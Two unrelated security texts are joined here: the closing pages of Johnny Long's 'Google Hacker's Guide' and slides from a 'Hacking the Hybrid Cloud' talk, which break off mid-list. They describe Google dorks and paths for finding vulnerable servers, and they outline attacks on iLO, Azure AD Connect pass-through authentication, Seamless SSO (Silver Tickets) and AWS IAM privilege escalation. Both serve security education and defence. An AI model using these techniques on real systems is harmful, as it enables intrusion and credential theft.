johnny-longs-g4 root$
Figure 23: Searching for the version name
As shown above, the full and complete version name is “CuteNews v1.3.1”. Putting the
two pieces of information together brings us to a very specific Google query: “Powered
by CuteNews v1.3.1” This query is very specific and locates nearly perfect results which
display sites running version 1.3.1 of the CuteNews software.
Figure 24: Results of the final CuteNews query
Using Google as a CGI scanner
One step beyond searching for “interesting” files is searching for vulnerable files via
Google. Many times, when a security vulnerability is discovered in a piece of Web server
software, the vulnerability centers around a particular file. Although it is not technically
accurate to do so, many attackers have come to call this type of vulnerability a CGI
script vulnerability since the early web-based vulnerabilities involved CGI scripts. Today,
web-based vulnerabilities can take many different forms, yet the ‘CGI scanner’ or ‘web
scanner’ has become one of the most indispensable tools in the world of web server
hacking. Mercilessly searching out vulnerable programs on a server, these programs
help pinpoint potential avenues for attack. These programs are brutally obvious,
incredibly noisy and fairly accurate tools. Reduced to the least common denominator,
these types of programs accomplish one task; discovering vulnerable files on a web
server. The accomplished Google hacker knows that this same task can be
accomplished more elegantly and subtly via Google query.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 29 -
In order to accomplish its task, these scanners must know what exactly to search for on
a web server. In most cases these tools are scanning web servers looking for
vulnerable files or directories that may contain sample code or vulnerable files. Either
way, the tools generally store these vulnerabilities in a file that is formatted like this:
/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi
/iissamples/ISSamples/SQLQHit.asp
/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi
How this technique can be used
The lines in a vulnerability file like the one shown above can serve as a roadmap for a
Google hacker. Each line can be broken down and used in either an ‘index.of’ or an
‘inurl’ search to find vulnerable targets. For example, a Google search for
‘allinurl:/random_banner/index.cgi’ returns the results shown in Figure 25.
Figure 25: Example search using a line from a CGI scanner
A hacker can take sites returned from this Google search, apply a bit of hacker ‘magic’
and eventually get the broken ‘random_banner’ program to cough up any file on that
web server, including the password file as shown in Figure 26.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 30 -
Figure 26: password file captured from a vulnerable site found using a Google search
Of the many Google hacking techniques we’ve looked at, this technique is one of the
best candidates for automation since the CGI scanner vulnerability files can be very
large. The gooscan tool, written by j0hnny performs this and many other functions.
Gooscan and automation is discussed later.
About Google automated scanning
With so many potential search combinations available, it’s obvious that an automated
tool scanning for a known list of potentially dangerous pages would be extremely useful.
However, Google frowns on such automation as quoted at
http://www.google.com/terms_of_service.html:
“You may not send automated queries of any sort to Google's system without
express permission in advance from Google. Note that "sending automated
queries" includes, among other things:
•
using any software which sends queries to Google to determine how a
website or webpage "ranks" on Google for various queries;
•
"meta-searching" Google; and
•
performing "offline" searches on Google.”
Google does offer alternatives to this policy in the form of the Google Web API’s found at
http://www.google.com/apis/. There are several major drawbacks to the Google API
program at the time of this writing. First, users and developers of Google API programs
must both have Google license keys. This puts a damper on the potential user base of
Google API programs. Secondly, API-created programs are limited to 1,000 queries per
day since “The Google Web APIs service is an experimental free program, so the
resources available to support the program are limited.” (according to the API FAQ found
at http://www.google.com/apis/api_faq.html#gen12.) With so many potential searches,
1000 queries is simply not enough.
The bottom line is that any user running an automated Google querying tool (with the
exception of API created tools) must obtain express permission in advance to do so. It is
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 31 -
unknown what the consequences of ignoring these terms of service are, but it seems
best to stay on Google’s good side.
The only exception to this rule appears to be the Google search appliance (described
below). The Google search appliance does not have the same automated query
restrictions since the end user, not Google, owns the appliance. One should, however,
obtain advance express permission from the owner or maintainer of the Google
appliance before searching it with any automated tool for various legal and moral
reasons.
Other Google stuff
Google Appliances
The Google search appliance is described at http://www.google.com/appliance/:
“Now the same reliable results you expect from Google web search can be yours
on your corporate website with the Google Search Appliance. This combined
hardware and software solution is easy to use, simple to deploy, and can be up
and running on your intranet and public website in just a few short hours.”
The Google appliance can best be described as a locally controlled and operated mini-
Google search engines for individuals and corporations. When querying a Google
appliance, often times the queries listed above in the “URL Syntax” section will not work.
Extra parameters are often required to perform a manual appliance query. Consider
running a search for "Steve Hansen" at the Google appliance found at Stanford. After
entering this search into the Stanford search page, the user is whisked away to a page
with this URL (chopped for readability):
http://find.stanford.edu/search?q=steve+hansen
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
Breaking this up into chunks reveals three distinct pieces. First, the target appliance is
find.stanford.edu. Next, the query is "steve hansen" or "steve+hansen" and
last but not least are all the extra parameters:
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
These parameters may differ from appliance to appliance, but it has become clear that
there are several default parameters that are required from a default installation of the
Google appliance like the one found at find.stanford.edu.
Googledorks
The term “googledork” was coined by Johnny Long (http://johnny.ihackstuff.com) and
originally meant “An inept or foolish person as revealed by Google.” After a great deal of
media attention, the term came to describe those “who troll the Internet for confidential
goods.” Either term is fine, really. What matters is that the term googledork conveys the
concept that sensitive stuff is on the web, and Google can help you find it. The official
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 32 -
googledorks page (found at http://johnny.ihackstuff.com/googledorks) lists many different
examples of unbelievable things that have been dug up through Google by the
maintainer of the page, Johnny Long. Each listing shows the Google search required to
find the information along with a description of why the data found on each page is so
interesting.
Gooscan
Gooscan (http://johnny.ihackstuff.com) is a UNIX (Linux/BSD/Mac OS X) tool that
automates queries against Google search appliances, but with a twist. These particular
queries are designed to find potential vulnerabilities on web pages. Think "cgi scanner"
that never communicates directly with the target web server, since all queries are sent to
Google, not to the target. For the security professional, gooscan serves as a front-end
for an external server assessment and aids in the "information gathering" phase of a
vulnerability assessment. For the web server administrator, gooscan helps discover what
the web community may already know about a site thanks to Google.
Gooscan was not written using the Google API. This raises questions about the “legality”
of using gooscan as a Google scanner. Is gooscan “legal” to use? You should not use
this tool to query Google without advance express permission. Google appliances,
however, do not have these limitations. You should, however, obtain advance express
permission from the owner or maintainer of the Google appliance before searching it
with any automated tool for various legal and moral reasons. Only use this tool to
query appliances unless you are prepared to face the (as yet unquantified) wrath
of Google.
Although there are many features, the gooscan tool’s primary purpose is to scan Google
(as long as you obtain advance express permission from Google) or Google appliances
(as long as you have advance express permission from the owner/maintainer) for the
items listed on the googledorks page. In addition, the tool allows for a very thorough CGI
scan of a site through Google (as long as you obtain advance express permission from
Google) or a Google appliance (as long as you have advance express permission from
the owner/maintainer of the appliance). Have I made myself clear about how this tool is
intended to be used? Get permission! =) Once you have received the proper advance
express permission, gooscan makes it easy to measure the Google exposure of yourself
or your clients.
GooPot
The concept of a honeypot is very straightforward. According to techtarget.com:
“A honey pot is a computer system on the Internet that is expressly set up to
attract and ‘trap’ people who attempt to penetrate other people's computer
systems.”
In order to learn about how new attacks might be conducted, the maintainers of a
honeypot system monitor, dissect and catalog each attack, focusing on those attacks
which seem unique.
An extension of the classic honeypot system, a web-based honeypot or “pagepot” is
designed to attract those employing the techniques outlined in this paper. The concept is
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 33 -
fairly straightforward. A simple googledork entry like “ i n u r l : a d m i n
inurl:userlist” could easily be replicated with a web-based honeypot by creating
an index.html page which referenced another index.html file in an /admin/userlist
directory. If a web search engine like Google was instructed to crawl the top-level
index.html page, if would eventually find the link pointing to /admin/userlist/index.html.
This link would satisfy the Google query of “inurl:admin inurl:userlist”
eventually attracting a curious Google searcher.
Once the Google searcher clicks on the Google, he is whisked away to the target web
page. In the background, the user’s web browser also sends many variables to that web
server, including one variable of interest, the “referrer” variable. This field contains the
complete name of the web page that was visited previously, or more clearly, the web site
that referred the user to the web page. The bottom line is that this variable can be
inspected to figure out how a web surfer found a web page assuming they clicked on
that link from a search engine page. This bit of information is critical to the maintainer of
a pagepot system, since it outlines the exact method the Google searcher used to locate
the pagepot system. The information aids in protecting other web sites from similar
queries.
The concept of a pagepot is not a new one thanks to many folks including the group at
http://www.gray-world.net/. Their web-based honeypot, hosted at http://www.gray-
world.net/etc/passwd/ is designed to entice those using Google like a CGI scanner. This
is not a bad concept, but as we’ve seen in this paper, there are so many other ways to
use Google to find vulnerable or sensitive pages.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 34 -
Enter GooPot, the Google honeypot system designed by [email protected]. By
populating a web server with sensitive-looking documents and monitoring the referrer
variables passed to the server, a GooPot administrator can learn about new web search
techniques being employed in the wild and subsequently protect his site from similar
queries. Beyond a simple pagepot, GooPot uses enticements based on the many
techniques outlined in the googledorks collection and this document. In addition, the
GooPot more closely resembles the juicy targets that Google hackers typically go after.
Johnny Long, the administrator of the googledorks list, utilizes the GooPot to discover
new search types and publicize them in the form of googledorks listings, creating a self-
sustaining cycle for learning about, and protecting from search engine attacks.
The GooPot system is not publicly available.
Google Sets
When searching for interested data via Google, most Google hackers eventually run out
of ideas when looking for targets. Enter Google Sets (http://labs.google.com/sets).
Google sets automatically creates lists of items when a user enters a few examples. The
results are based on all the data the Google has crawled over the years.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 35 -
As a simple example, if a user were to enter “Ford” and “Lincoln”, Google sets would
return “Ford, Lincoln, Mercury, Dodge, Chrysler, Jaguar, CADILLAC, Chevrolet, Jeep,
Plymouth, Oldsmobile, Pontiac, Mazda, Honda, and Saturn” and would offer to expand
the list to show even more items.
If, however, the user were to enter “password” Google would show the terms “Password,
User, Name, username, Host, name, Login, Remote, Directory, shell, directories, User,
ID, userid, Email, Address, Register, name, Email, Login, FTP and HOSTNAME”
Using Google Sets not only helps the Google hacker come up with new ways to search
for sensitive data, it gives a bit of a preview of how the Google results will lean if you
include certain words in a search. This type of exercise can prove to be less time
consuming than sifting through pages of Google results trying to locate trends.
A word about how Google finds pages (Opera)
Although the concept of web crawling is fairly straightforward, Google has created other
methods for learning about new web pages. Most notably, Google has incorporated a
feature into the latest release of the Opera web browser. When an Opera user types a
URL into the address bar, the URL is sent to Google, and is subsequently crawled by
Google’s bots. According to the FAQ posted at http://www.opera.com/adsupport:
“The Google system serves advertisements and related searches to the Opera
browser through the Opera browser banner 468x60 format. Google determines
what ads and related searches are relevant based on the URL and content of the
page you are viewing and your IP address, which are sent to Google via the
Opera browser.”
As of the time of this writing it is unclear as to whether or not Google includes the link
into it’s search engine. However, testing shows that when an unindexed URL
(http://johnny.ihackstuff.com/temp/suck.html) was entered into Opera 7.2.3, a Googlebot
crawled the URL moments later as shown by the following access.log excerpts:
64.68.87.41 - "GET /robots.txt HTTP/1.0" 200 220 "-" "Mediapartners-
Google/2.1 (+http://www.googlebot.com/bot.html)"
64.68.87.41 - "GET /temp/suck.html HTTP/1.0" 200 5 "-" "Mediapartners-
Google/2.1 (+http://www.googlebot.com/bot.html)"
The privacy implications of this could be staggering, especially if you Opera users expect
visited URLs to remain private.
This feature can be turned off within Opera by selecting “Show generic selection of
graphical ads” from the “File -> Preferences -> Advertising” screen.
Protecting yourself from Google hackers
1. Keep your sensitive data off the web!
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 36 -
Even if you think you’re only putting your data on a web site temporarily, there’s a
good chance that you’ll either forget about it, or that a web crawler might find it.
Consider more secure ways of sharing sensitive data such as SSH/SCP or
encrypted email.
2. Googledork!
•
Use the techniques outlined in this paper to check your own site for
sensitive information or vulnerable files.
•
Use gooscan from http://johnny.ihackstuff.com) to scan your site for bad
stuff, but first get advance express permission from Google! Without
advance express permission, Google could come after you for violating
their terms of service. The author is currently not aware of the exact
implications of such a violation. But why anger the “Goo-Gods”?!?
•
Check the official googledorks website (http://johnny.ihackstuff.com) on a
regular basis to keep up on the latest tricks and techniques.
3. Consider removing your site from Google’s index.
The Google webmaster FAQ located at http://www.google.com/webmasters/
provides invaluable information about ways to properly protect and/or expose
your site to Google. From that page:
“Please have the webmaster for the page in question contact us with proof that
he/she is indeed the webmaster. This proof must be in the form of a root level
page on the site in question, requesting removal from Google. Once we receive
the URL that corresponds with this root level page, we will remove the offending
page from our index.”
In some cases, you may want to rome individual pages or snippets from Google’s
index. This is also a straightforward process which can be accomplished by
following the steps outlined at http://www.google.com/remove.html.
4. Use a robots.txt file.
Web crawlers are supposed to follow the robots exclusion standard found at
http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure
for “politely requesting” that web crawlers ignore all or part of your website. I
must note that hackers may not have any such scruples, as this file is certainly a
suggestion. The major search engine’s crawlers honor this file and it’s contents.
For examples and suggestions for using a robots.txt file, see the above URL on
robotstxt.org.
Thanks and shouts
First, I would like to thank God for the taking the time to pierce my way-logical mind with
the unfathomable gifts of sight by faith and eternal life through the sacrifice of Jesus
Christ.
The Google Hacker’s Guide
[email protected]
http://johnny.ihackstuff.com
- Page 37 -
Thanks to my family for putting up with the analog version of j0hnny.
Shouts to the STRIKEFORCE, “Gotta_Getta_Hotdog” Murray, “Re-Ron” Shaffer, “2 cute
to B single” K4yDub, “Nice BOOOOOSH” Arnold, “Skull Thicker than a Train Track”
Chapple, “Bitter Bagginz” Carter, Fosta’ (student=teacher;), Tiger “Lost my badge”
Woods, LARA “Shake n Bake” Croft, “BananaJack3t” Meyett, Patr1ckhacks, Czup, Mike
“Scan Master, Scan Faster” Walker, “Mr. I Love JAVA” Webster, “Soul Sistah” G Collins,
Chris, Carey, Matt, KLOWE, haywood, micah, Shouts to those who have passed on:
Chris, Ross, Sanguis, Chuck, Troy, Brad.
Shouts to Joe “BinPoPo”, Steve Williams (by far the most worthy defender I’ve had the
privilege of knowing) and to “Bigger is Better” Fr|tz.
Thanks to my website members for the (admittedly thin) stream of feedback and
Googledork additions. Maybe this document will spur more submissions.
Thanks to JeiAr at GulfTech Security <www.gulftech.org>, Cesar <[email protected]>
of Appdetective fame, and Mike “Supervillain” Carter for the outstanding contributions to
the googledorks database.
Thanks to Chris O'Ferrell (www.netsec.net), Yuki over at the Washington Post, Slashdot,
and TheRegister.co.uk for all the media coverage. While I’m thanking my referrers, I
should mention Scott Granneman for the front-page SecurityFocus article that was all
about Googledorking. He was nice enough to link me and call Googledorks his “favorite
site” for Google hacking even though he didn’t mention me by name or return any of my
emails. I’m not bitter though… it sure generated a lot of traffic! After all the good press,
it’s wonderful to be able to send out a big =PpPPpP to NewScientist Magazine for their
particularly crappy coverage of this topic. Just imagine, all this traffic could have been
yours if you had handled the story properly.
Shouts out to Seth Fogie, Anton Rager, Dan Kaminsky, rfp, Mike Schiffman, Dominique
Brezinski, Tan, Todd, Christopher (and the whole packetstorm crew), Bruce Potter,
Dragorn, and Muts (mutsonline, whitehat.co.il) and my long lost friend Topher.
Hello’s out to my good friends SNShields and Nathan.
When in Vegas, be sure to visit any of the world-class properties of the MGM/Mirage or
visit them online at http://mgmmirage.com. =) | pdf |
Hacking the Hybrid Cloud
Sean Metcalf (@PyroTek3)
s e a n @ Trimarc Security . com
TrimarcSecurity.com
ABOUT
• Founder Trimarc (Trimarc.io), a professional services company that
helps organizations better secure their Microsoft platform, including
the Microsoft Cloud and VMWare Infrastructure.
• Microsoft Certified Master (MCM) Directory Services
• Microsoft MVP (2017, 2019, & 2020)
• Speaker: Black Hat, Blue Hat, BSides, DEF CON, DEF CON Cloud Village
Keynote, DerbyCon, Shakacon, Sp4rkCon
• Security Consultant / Researcher
• Active Directory Enthusiast - Own & Operate ADSecurity.org
(Microsoft platform security info)
Sean Metcalf | @PyroTek3 | [email protected]
AGENDA
• Hybrid Cloud
• The Cloud & Virtualization
• Compromising Domain Controllers (On-Prem)
• Cloud Hosted/Managed Active Directory
• Amazon AWS
• Microsoft Azure
• Google Cloud Platform (GC)
• Attacking Hybrid Components
• Cloud Administration (IAM)
• Compromising On-Prem Domain Controllers Hosted in the Cloud –
AWS & Azure
• Conclusion
Sean Metcalf | @PyroTek3 | [email protected]
What is Hybrid Cloud?
•Blend of on-prem infrastructure combined with cloud
services.
•Typically on-prem infrastructure with some cloud
hosted infrastructure (IAAS) and services (SAAS).
•Connection points between on-prem and cloud often
don’t focus on security.
Sean Metcalf | @PyroTek3 | [email protected]
Hybrid Cloud Scenarios
•On-Prem AD with Office 365 Services (SaaS)
• Office 365 to host mailboxes with authentication
performed by Active Directory on-prem.
•Cloud Datacenter
• Extending the datacenter to the cloud leveraging Azure
and/or Amazon AWS (IaaS).
•On-Prem AD with Cloud Hosted AD as Resource Forest
• Trust between on-prem AD and cloud hosted AD
•Combination of these (or other)
Sean Metcalf | @PyroTek3 | [email protected]
The Cloud &
Virtualization
Sean Metcalf | @PyroTek3 | [email protected]
Conceptually The Cloud is Virtualization (effectively)
• Cloud provider Infrastructure as a Service (IaaS) architecture
and configuration
• Amazon AWS architecture to host VMs (instances) which has
leveraged XEN and more recently (2018) Amazon’s Nitro
(based off KVM core kernel).
• Azure leverages a customized version of Hyper-V (core) to
host Azure VMs.
• Google Cloud Platform (GCP) uses KVM for virtualization.
• There is a cloud “fabric” that ties the “virtualization”
component with orchestration (and storage, network, etc).
Sean Metcalf | @PyroTek3 | [email protected]
https://docs.microsoft.com/en-us/azure/architecture/reference-architectures/n-tier/windows-vm
Sean Metcalf | @PyroTek3 | [email protected]
https://www.awsgeek.com/AWS-re-Invent-2018/Powering-Next-Gen-EC2-Instances-Deep-Dive-into-the-Nitro-System/
Sean Metcalf | @PyroTek3 | [email protected]
Access Office 365 with AWS Managed Microsoft AD
https://aws.amazon.com/blogs/security/how-to-enable-your-users-to-access-office-365-with-aws-
microsoft-active-directory-credentials/
Sean Metcalf | @PyroTek3 | [email protected]
https://aws.amazon.com/blogs/apn/diving-deep-on-the-foundational-blocks-of-vmware-cloud-on-aws/
VMWare Cloud on AWS
Sean Metcalf | @PyroTek3 | [email protected]
Compromising
On-Prem
Domain Controllers
Sean Metcalf | @PyroTek3 | [email protected]
Physical DCs
• Physical Access
• Out of Band Management (HP ILO)
• Check for port 2381 on servers for ILO web service (on same
network –which is bad)
Sean Metcalf | @PyroTek3 | [email protected]
Test-NetConnection $IPAddress -Port 2381
Airbus
Security
Identified iLO
Security
Issues:
• A new exploitation technique that allows compromise of the
host server operating system through DMA.
• Leverage a discovered RCE to exploit an iLO4 feature which
allows read-write access to the host memory and inject a
payload in the host Linux kernel.
• New vulnerability in the web server to flash a new backdoored
firmware.
• The use of the DMA communication channel to execute
arbitrary commands on the host system.
• iLO (4/5) CHIF channel interface opens a new attack surface,
exposed to the host (even though iLO is set as disabled).
Exploitation of CVE-2018-7078 could allow flashing a
backdoored firmware from the host through this interface.
• We discovered a logic error (CVE-2018-7113) in the kernel
code responsible for the integrity verification of the userland
image, which can be exploited to break the chain-of-trust.
Related to new secure boot feature introduced with iLO5 and
HPE Gen10 server line.
• Provide a Go scanner to discover vulnerable servers running
iLO
https://github.com/airbus-seclab/ilo4_toolbox
Virtual DCs: VMWare
• Compromise VMWare administration
• Compromise account with VMWare access to Virtual DCs
• Compromise system running vCenter (Windows system or
appliance) since this is an administration gateway that
owns vSphere
• Identify VMWare ESXi Root account password and use to
compromise ESXi hosts
(similar to local Administrator account on Windows)
• Connect directly to virtual DCs with the VIX API
(via VMWare Tools)
Sean Metcalf | @PyroTek3 | [email protected]
Virtual DCs: Hyper-V
•Compromise members of “Hyper-V Admins” group.
•Compromise server hosting Hyper-V.
•Compromise local admin account on the Hyper-V
server (pw may be the same as other servers)
•Compromise account with GPO modify rights to the
OU containing Hyper-V servers.
Sean Metcalf | @PyroTek3 | [email protected]
Cloud
Hosted/Managed Active
Directory
& What this Means to Pentesters & Red Teams
Sean Metcalf | @PyroTek3 | [email protected]
Cloud Hosted/Managed AD
• AD environment spun up per customer by cloud provider
• 100% managed AD by the cloud provider
• Customer does not get Domain Admin rights or access to Domain
Controllers
• Amazon AWS, Microsoft Azure, and Google Cloud Platform all have a
host Managed AD environments for customers, with some differences
Sean Metcalf | @PyroTek3 | [email protected]
AWS Directory Service for Microsoft Active Directory
Sean Metcalf | @PyroTek3 | [email protected]
AWS Directory Service for Microsoft Active Directory
Sean Metcalf | @PyroTek3 | [email protected]
AWS Directory Service for Microsoft Active Directory
• 2 DCs running Windows Server 2012 R2 (172.31.14.175 &
172.31.22.253)
• Default domain Administrator account “Administrator” in the
“AWS Reserved” OU.
• First account is “Admin” and gains full rights on customer OU
• Customer OU created and rights delegated to AWS
Administrators (& default Admin account)
• The domain password policy is default, but the customer has the
ability to modify 5 pre-created Fine-grained password policies
• The DC auditing policy is decent except no Kerberos audit
policies, so no way to detect Kerberoasting (requires "Audit
Kerberos Service Ticket Operations" auditing).
Sean Metcalf | @PyroTek3 | [email protected]
AWS Managed AD – Customer Admin Account
Sean Metcalf | @PyroTek3 | [email protected]
AWS Microsoft AD Delegation Groups
• AWS Delegated Administrators group is delegated most rights including:
• Group Modify rights on the "AWS Delegated Groups: OU
• "Reanimate-Tombstones" (effectively the ability to undelete objects)
• AWS Delegated Managed Service Account Administrators group is
delegated rights to create and manage MSAs
• AWS Delegated Add Workstations To Domain Users added to the "Add
workstations to domain" URA on DC GPO
• AWS Delegated Kerberos Delegation Administrators added to "Enable
computer and user accounts to be trusted for delegation"
• AWS Delegated Replicate Directory Changes Administrators group is
delegated "DS-Replication-Get-Changes" at the domain level
• AWS Delegated Domain Name System Administrators is added to the
DNSAdmins group providing DNS administration.
• AWS Delegated Server Administrators group is added to the local
Administrators on all computers in the customer OU ("LAB") and child
OUs via the GPO "ServerAdmins".
Sean Metcalf | @PyroTek3 | [email protected]
Azure Active
Directory Domain
Services
Sean Metcalf | @PyroTek3 | [email protected]
Azure Active Directory Domain Services (Managed AD)
Sean Metcalf | @PyroTek3 | [email protected]
Azure AD Directory Services (Managed AD)
• 2 DCs running Windows Server 2012 R2 (10.0.1.4 & 10.0.1.5)
• Default domain Administrator account “dcaasadmin” (default location)
• Initial admin account is Azure AD account – can select Azure AD accounts
(or synched on-prem AD accounts)
• Customer OUs: AADDC Computers & AADDC Users
• 1 Fine-Grained Password Policy (FGPP) called “AADDSSTFPSO”
• Authenticated Users can add computers to the domain
• Event auditing on Managed AD Domain Controllers not configured via
GPO, so can’t see configuration.
Sean Metcalf | @PyroTek3 | [email protected]
Azure AD DS Delegation Groups
• AAD DC Administrators has the ability to create new OUs (domain)
• AAD DC Administrators is delegated Full Control on:
• AADDC Computers
• AADDSSyncEscrows
• AADDSSyncState
• Managed Service Accounts
• Program Data
• AAD DC Administrators has Edit Settings rights on the GPOs:
• AADDC Computers GPO (linked to OU=AADDC
Computers,DC=trimarcrd,DC=com)
• AADDC Users GPO (linked to OU=AADDC Users,DC=trimarcrd,DC=com)
• The GPO AADDC Computers GPO adds AAD DC Administrators to the
local group Administrators in the following OU AADDC Computers
• AAD DC Service Accounts has DS-Replication-Get-Changes rights
Sean Metcalf | @PyroTek3 | [email protected]
GCP Managed
Service for
Microsoft Active
Directory
(Managed
Microsoft AD)
Sean Metcalf | @PyroTek3 | [email protected]
GCP Managed Microsoft AD
Sean Metcalf | @PyroTek3 | [email protected]
GCP Managed Microsoft AD
• 2 DCs running Windows Server 2019 Datacenter (2012R2 Forest FL)
• The AD Recycle Bin has not been enabled
• Default domain Administrator account “Administrator” (disabled)
• 2nd domain admin account “cloudsvcadmin”
• First account is customer created (“setupadmin” –can be changed)
• The domain password policy is default, but the customer has the
ability to create Fine-grained password policies
• Event auditing on Managed AD Domain Controllers not configured
via GPO, so can’t see configuration.
Sean Metcalf | @PyroTek3 | [email protected]
GCP Managed AD Delegation Groups
• Cloud Service All Administrators
• Delegated Full Control on all objects (& link GPO rights) in the Cloud OU
• Cloud Service Administrators
• Member of Cloud Service All Administrators & Group Policy Creator Owners
• Cloud Service Computer Administrators
• Added to local Administrators group via GPO on Cloud OU
• Cloud Service Managed Service Account Administrators
• Delegated Full Control on the Managed Service Accounts OU
• Cloud Service DNS Administrators
• Cloud Service Protected Users
• Cloud Service Group Policy Creator Owners
Sean Metcalf | @PyroTek3 | [email protected]
Managed AD Common Themes
• No customer Domain Admin or Domain Controller rights.
• Custom OU(s) are provided for customer use (users, computers, groups,
etc.).
• Delegation groups provides AD component management capability to
customer.
• Domain Password Policy is default (7 characters), with the ability to adjust
via Fine-Grained Password Policies.
• Azure AD DS & GCP Managed AD both seem to have default Domain
Controller GPO settings.
• All provide the ability to configure an AD trust, so you may see the on-prem
AD forest trust a Managed AD environment (in the near future).
• Slightly different (or quite different!) approaches are used to provide the
same or similar capability.
Sean Metcalf | @PyroTek3 | [email protected]
AD Security Review PowerShell Script: https://trimarc.co/ADCheckScript
Attacking Managed AD
• Determine which Managed AD you are viewing (combination of OU and
group names)
• Likely no escalation to Domain Admins, so focus on delegation groups &
membership
• Identify default customer admin account.
• Azure AD DS can be managed by Azure AD accounts that are synchronized
into Azure AD DS or even on-prem AD accounts synched in from the on-
prem Azure AD Connect (through Azure AD) to Azure AD DS. If Password
Hash Sync (PHS) is enabled, then the on-prem AD account hash is included.
• Enumerate Managed AD privileged group membership.
• Managed AD typically used & managed by Application Owners who may not
realize the rights they do have as members in the Managed AD delegation
groups.
• DC auditing may not be configured to detect malicious activity (or sent to
SIEM)
Sean Metcalf | @PyroTek3 | [email protected]
Attacking
Hybrid Cloud Components
Amazon AD Connector
https://aws.amazon.com/blogs/security/how-to-connect-your-on-premises-active-directory-to-aws-using-ad-connector/
Sean Metcalf | @PyroTek3 | [email protected]
Microsoft Pass-Through Authentication (PTA)
https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta
Sean Metcalf | @PyroTek3 | [email protected]
Attacking Microsoft PTA
•Managed by Azure AD Connect
•Compromise server hosting PTA (typically Azure AD
Connect server)
•Azure AD sends the clear-text password (not hashed!)
to authenticate the user.
•Inject DLL to compromise credentials used for PTA
https://blog.xpnsec.com/azuread-connect-for-redteam/
Sean Metcalf | @PyroTek3 | [email protected]
Azure AD Seamless Single Sign-On
https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso
Sean Metcalf | @PyroTek3 | [email protected]
Azure AD Seamless Single Sign-On
https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso
Sean Metcalf | @PyroTek3 | [email protected]
Attacking Azure AD Seamless Single Sign-On
• Managed by Azure AD Connect
• “Azure AD exposes a publicly available endpoint that accepts
Kerberos tickets and translates them into SAML and JWT
tokens”
• Compromise the Azure AD Seamless SSO Computer Account
password hash (“AZUREADSSOACC “)
• Generate a Silver Ticket for the user you want to
impersonate and the service ‘aadg.windows.net.nsatc.net ‘
• Inject this ticket into the local Kerberos cache
• Azure AD Seamless SSO computer account password doesn’t
change
https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/
Sean Metcalf | @PyroTek3 | [email protected]
Attacking Azure AD Connect
DEF CON 25
(July 2017)
On-Prem: Acme’s Azure AD Connect
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem: Acme’s Azure AD Connect
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem: Acme’s Azure AD Connect
Sean Metcalf | @PyroTek3 | [email protected]
On-Prem: Acme’s Azure AD Connect
Sean Metcalf | @PyroTek3 | [email protected]
Cloud Administration
Identity Access Management (IAM)
Sean Metcalf | @PyroTek3 | [email protected]
Cloud Administration & Roles
•Administrative groups are called Roles
•Each role has specifically delegated access.
•Depending on the cloud provider, custom roles can be
created with custom delegation and rights.
•Azure and Amazon AWS each have their own methods
for this, but the concepts are the same.
Sean Metcalf | @PyroTek3 | [email protected]
Azure IAM – Role Types
•Owner
• Has full access to all resources including the right to
delegate access to others.
•Contributor
• Can create and manage all types of Azure resources but
can't grant access to others.
•Reader
• Can view existing Azure resources.
Sean Metcalf | @PyroTek3 | [email protected]
Azure IAM – Privileged Roles
•Tenant Admins
• Owner Role on the Tenant
• Full control over the tenant and all subscriptions
•Subscription Admin
• Owner Role on the Subscription
• Full control over the subscription
Sean Metcalf | @PyroTek3 | [email protected]
Sean Metcalf | @PyroTek3 | [email protected]
AWS IAM (Organizations)
• Root Account (Payer Account) – organization primary account
(often the first account)
• Account Admins
• Full control over the Account and everything in the account (account
services)
• If Root Account (admin) AND Account Admin = Full organizational
control
• No real “subscription” concept
• Organizational Unit concept that provides granular
administration of instances (EC2)
Sean Metcalf | @PyroTek3 | [email protected]
AWS IAM Privilege Escalation Methods
•
Creating a new policy version (iam:CreatePolicyVersion)
•
This privilege escalation method could allow a user to gain full administrator access of the AWS account.
•
Creating an EC2 instance with an existing instance profile (iam:PassRole and ec2:RunInstances )
•
This attack would give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account.
•
Creating a new user access key (iam:CreateAccessKey)
•
This method would give an attacker the same level of permissions as any user they were able to create an access key for, which could range from no privilege escalation to full administrator access to the
account.
•
Create/update new login profile (iam:CreateLoginProfile / iam:UpdateLoginProfile)
•
This method would give an attacker the same level of permissions as any user they were able to create a login profile for, which could range from no privilege escalation to full administrator access to the
account.
•
Attaching a policy to a user (iam:AttachUserPolicy)
•
An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a user, giving them full administrator access to the AWS environment.
•
Attaching a policy to a group (iam:AttachGroupPolicy)
•
An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a group, giving them full administrator access to the AWS environment.
•
Attaching a policy to a role (iam:AttachRolePolicy)
•
An attacker would be able to use this method to attach the AdministratorAccess AWS managed policy to a role, giving them full administrator access to the AWS environment.
•
Creating/updating an inline policy for a user (iam:PutUserPolicy)
•
Due to the ability to specify an arbitrary policy document with this method, the attacker could specify a policy that gives permission to perform any action on any resource, ultimately escalating to full
administrator privileges in the AWS environment.
•
Creating/updating an inline policy for a group (iam:PutGroupPolicy)
•
